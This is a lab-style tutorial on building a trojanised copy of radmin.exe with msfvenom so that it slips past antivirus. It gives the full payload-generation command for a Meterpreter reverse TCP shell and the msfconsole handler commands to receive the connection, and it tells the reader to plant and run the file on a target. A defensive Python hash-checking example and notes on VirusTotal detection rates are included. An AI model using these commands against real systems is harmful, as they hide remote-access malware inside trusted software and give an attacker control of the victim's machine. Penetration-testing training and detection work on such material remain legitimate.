
Bypassing Antivirus using MSFVenom

When we make an exe file and plant it on the target, the antivirus detects it. To avoid that, we can use msfvenom. Here we will use msfvenom to fuse a malicious exe with a legitimate Windows application exe. Let's go through the process step by step.

Deliverable:

Lab Set up

  • Virtualization using Oracle VirtualBox

  • Attacker’s System: Kali Linux

In Kali Linux --> Terminal

1. Creating a malicious exe fused with the legitimate Windows application radmin.exe.

~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP address of attacker system] LPORT=1337 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe

Here, msfvenom --> tool used to generate the payload and bypass antivirus

-p --> payload

windows/meterpreter/reverse_tcp --> payload used (you can use another payload)

LHOST --> Local Host (Attacker System)

LPORT --> Local Port (port on the attacker system that listens for the reverse connection)

1337 --> port number on which to listen for the reverse connection

-x --> template: a custom legitimate exe to embed the payload in

/usr/share/windows-binaries/radmin.exe --> legitimate exe to be fused

-k --> keep: preserves the template's normal behaviour and runs the payload separately from it

-f --> output format to be used

exe --> output format

2. Start a handler in msfconsole to receive the reverse connection, as done in the previous exercise.

~# msfconsole

> use exploit/multi/handler

> set payload windows/meterpreter/reverse_tcp

> show options

> set LHOST [IP address of attacker system]

> set LPORT 1337

> exploit

3. Meanwhile, plant the malicious exe created in step 1 on the target Windows system and see whether the antivirus detects it as a malicious file. If it does not, run the exe and you will get a reverse Meterpreter shell.


Note 1: We can check whether an exe is the legitimate original or a modified (malicious) copy by comparing MD5 or SHA-512 hashes, since the hash of the modified file will differ from the hash of the legitimate one.

For example,

~# md5sum [filename]

or

~# sha512sum [filename]

Use either of the above to compute and compare the hashes of both files (i.e. the malicious as well as the legitimate one).
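The hash comparison described in Note 1, as an added example that is not part of the original exercise: it hashes a file in chunks (MD5 and SHA-512), checks it against a recorded known-good SHA-512, and demonstrates on two constructed sample files (a stand-in "original" and a copy with bytes appended, mimicking a template that had a payload fused into it) that any modification changes the digest. The file names and contents are constructed for the demo; a differing digest proves only that the file is not the original, not what the change does.

```python
# Added example (not the original page's code): verify whether a Windows
# executable is still the legitimate original by comparing its MD5 and
# SHA-512 digests against a known-good value recorded from the clean copy.
import hashlib
import os
import tempfile
from typing import Dict


def digest_bytes(data: bytes) -> Dict[str, str]:
    """Return the MD5 and SHA-512 hex digests of an in-memory byte string."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
    }


def digest_file(path: str, chunk_size: int = 1 << 20) -> Dict[str, str]:
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    md5 = hashlib.md5()
    sha512 = hashlib.sha512()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            md5.update(chunk)
            sha512.update(chunk)
    return {"md5": md5.hexdigest(), "sha512": sha512.hexdigest()}


def is_modified(suspect_path: str, known_good_sha512: str) -> bool:
    """True when the file's SHA-512 differs from the recorded known-good value.

    Comparison is case-insensitive because published hash listings use both
    upper- and lower-case hex.
    """
    return digest_file(suspect_path)["sha512"].lower() != known_good_sha512.lower()


def demo() -> Dict[str, object]:
    """Build two constructed sample files and compare them against a baseline.

    'radmin_original.exe' stands in for the clean template and 'radmin.exe'
    for the same bytes with extra data appended (a crude stand-in for a fused
    payload). Results are returned rather than printed so they can be checked.
    """
    with tempfile.TemporaryDirectory() as tmp:
        legit = os.path.join(tmp, "radmin_original.exe")  # constructed name
        fused = os.path.join(tmp, "radmin.exe")            # constructed name
        # Constructed sample content: a fake DOS/PE header followed by filler.
        original = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"A" * 1024
        with open(legit, "wb") as fh:
            fh.write(original)
        with open(fused, "wb") as fh:
            fh.write(original + b"\x90" * 64)  # appended bytes = modification
        baseline = digest_file(legit)["sha512"]  # the "known-good" record
        return {
            "legit_hashes": digest_file(legit),
            "fused_hashes": digest_file(fused),
            "legit_modified": is_modified(legit, baseline),
            "fused_modified": is_modified(fused, baseline),
        }


if __name__ == "__main__":
    result = demo()
    for name in ("legit", "fused"):
        hashes = result[f"{name}_hashes"]
        verdict = "MODIFIED" if result[f"{name}_modified"] else "matches known-good"
        print(f"{name}: sha512={hashes['sha512'][:16]}... {verdict}")
```

In practice the known-good SHA-512 comes from a trusted source (vendor download page or a clean install), is recorded before any file is planted, and is compared with `is_modified()` against the copy found on the target; MD5 is shown only because the exercise mentions it, SHA-512 is the one to rely on.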


Note 2: To find out which antivirus programs detect this exe as malicious, we can use VirusTotal. VirusTotal is a website that scans a submitted file with the signatures of many leading antivirus engines. For example, radmin.exe (the malicious exe created in this exercise) is detected as a malicious file by around 31/57 antivirus programs (the number may vary).


Note 3: Microsoft Security Essentials will detect this exe as a malicious file.


4. To decrease this detection count further we can use encoders (next exercise).

